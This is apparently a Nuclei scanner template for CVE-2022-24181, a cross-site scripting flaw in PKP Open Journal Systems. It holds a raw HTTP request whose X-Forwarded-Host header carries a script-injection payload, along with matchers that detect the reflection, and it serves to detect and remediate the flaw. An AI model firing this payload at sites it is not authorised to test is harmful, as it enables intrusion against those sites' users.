53 lines
1.8 KiB
YAML
53 lines
1.8 KiB
YAML
id: CVE-2022-24181
|
|
|
|
info:
|
|
name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting
|
|
author: lucasljm2001,ekrause
|
|
severity: medium
|
|
description: |
|
|
PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.
|
|
remediation: |
|
|
Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50881
|
|
- https://github.com/pkp/pkp-lib/issues/7649
|
|
- https://youtu.be/v8-9evO2oVg
|
|
- https://nvd.nist.gov/vuln/detail/cve-2022-24181
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-24181
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00168
|
|
epss-percentile: 0.533
|
|
cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: public_knowledge_project
|
|
product: open_journal_systems
|
|
tags: cve,cve2022,xss,oss,pkp-lib,edb
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /iupjournals/index.php/esj HTTP/2
|
|
Host: {{Hostname}}
|
|
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(document.domain)</script><x=".com/iupjournals'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100bc7693342a5dda66d23ca930d772710272c014a7592e8dc960b11a1e27b11e3a022100e7857a8994ab0e5d018e11da9a4c4aafa0e8c0d9ca81240567a0e099452d6c28:922c64590222798bb761d5b6d8e72950 |